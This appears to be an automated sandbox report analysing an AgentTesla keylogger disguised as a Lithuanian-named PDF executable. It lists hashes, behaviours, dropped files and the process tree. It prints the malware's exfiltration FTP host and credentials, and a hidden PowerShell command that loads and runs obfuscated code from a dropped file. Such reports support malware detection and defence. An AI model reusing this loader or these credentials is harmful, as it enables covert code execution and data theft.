Overview

overview

10

Static

static

1

Sutarčių...df.exe

windows7-x64

10

Sutarčių...df.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2023 01:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Sutarčių analizė-pdf.exe

  • Size

    711KB

  • MD5

    102714cb47ab0624d79ed174a8231ad6

  • SHA1

    8991d7808c89d2c6209322b20ea4a8b75f78fb44

  • SHA256

    0da1ad1d456b5b7a028efcbfd9c3ee45af7c6830c87c1e7469faa089dbb0fe7e

  • SHA512

    7467ec91c266be688bf97f92a72068bf3271b1c58bf7ded76fce89fa93a8c06d631727b68c4938df57dbab3f0a07a0f6820f3587e87155a77e9d424e288b9bf2

  • SSDEEP

    12288:twFGHEOFmZPT0TRoi+kXjhk5na5hylgimtdYM3O0V7bbnL:t5HEOOPOaMd4na2lgZtub0V7z

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Sutarčių analizė-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\Sutarčių analizė-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Preciosity=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Spdlammene\cirka\Buzzardlike\Mavepinerne\Profanenesses.Gru';$Besvorne=$Preciosity.SubString(54587,3);.$Besvorne($Preciosity)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1528
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 1864
          4⤵
          • Program crash
          PID:3500
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1528 -ip 1528
    1⤵
      PID:372

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
      Filesize

      32B

      MD5

      a8ca1db6ae34f5e5c152094f44f92476

      SHA1

      9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

      SHA256

      1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

      SHA512

      e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eeubztba.53b.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Colorimetric\Indtappende\Hngekjeeffekt\Fradragendes.Att
      Filesize

      306KB

      MD5

      4e478447d9bbee96f0f4363fa03f3646

      SHA1

      ccd297ac9497fda8c12fab076d1871f1241113e8

      SHA256

      3d957ab6b870abeabd8f1c19cb39ed6ca54b6cece2a7d8610826a64c67654fd5

      SHA512

      f1e7db8f2dbc147832c41bb95965cf8d8359b1980a433e9a8325e773d307310538f97349fd0d8ca3658184ea3d46eb5177125117c4b863f490f116938ba71320

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Spdlammene\cirka\Buzzardlike\Mavepinerne\Profanenesses.Gru
      Filesize

      53KB

      MD5

      069fd38747b58c05cc92771b20ff6206

      SHA1

      be3b1d1460ac825103741964b76e1883f59fb8fa

      SHA256

      640d92dda0382f293796ccfc9c51d21da8c24bba7c8c12d8e189c9fdeb4dda64

      SHA512

      1f35e64354054a374215fb5013dcbd3835ae216a999e63736a6aeeb88184cce7c67801be09a9db3f830d50174ccb08d4afc67a21d47f3a889b279d781ba98b57

      Download Submit

    • memory/1528-186-0x000000006E800000-0x000000006FA54000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/1528-197-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1528-195-0x0000000000A30000-0x00000000047C9000-memory.dmp

      Filesize

      61.6MB

      Download

    • memory/1528-194-0x0000000022760000-0x0000000022770000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1528-192-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1528-193-0x000000006E800000-0x000000006E840000-memory.dmp

      Filesize

      256KB

      Download

    • memory/1528-190-0x0000000000A30000-0x00000000047C9000-memory.dmp

      Filesize

      61.6MB

      Download

    • memory/1528-189-0x000000006E800000-0x000000006FA54000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/1528-187-0x0000000077661000-0x0000000077781000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/1528-188-0x00000000776E8000-0x00000000776E9000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2428-168-0x00000000062B0000-0x00000000062FC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2428-185-0x0000000077661000-0x0000000077781000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/2428-172-0x00000000064F0000-0x0000000006512000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2428-173-0x00000000075B0000-0x0000000007B54000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2428-150-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2428-153-0x0000000005030000-0x0000000005658000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/2428-154-0x0000000004F90000-0x0000000004FB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2428-151-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-179-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2428-180-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-182-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-183-0x0000000008860000-0x000000000C5F9000-memory.dmp

      Filesize

      61.6MB

      Download

    • memory/2428-184-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-171-0x00000000064A0000-0x00000000064BA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2428-170-0x0000000006F60000-0x0000000006FF6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/2428-169-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-178-0x0000000007470000-0x0000000007474000-memory.dmp

      Filesize

      16KB

      Download

    • memory/2428-167-0x0000000005F70000-0x0000000005F8E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2428-166-0x0000000005970000-0x0000000005CC4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2428-191-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2428-152-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-156-0x0000000005900000-0x0000000005966000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2428-155-0x0000000005890000-0x00000000058F6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2428-149-0x00000000029A0000-0x00000000029D6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/2428-175-0x00000000081E0000-0x000000000885A000-memory.dmp

      Filesize

      6.5MB

      Download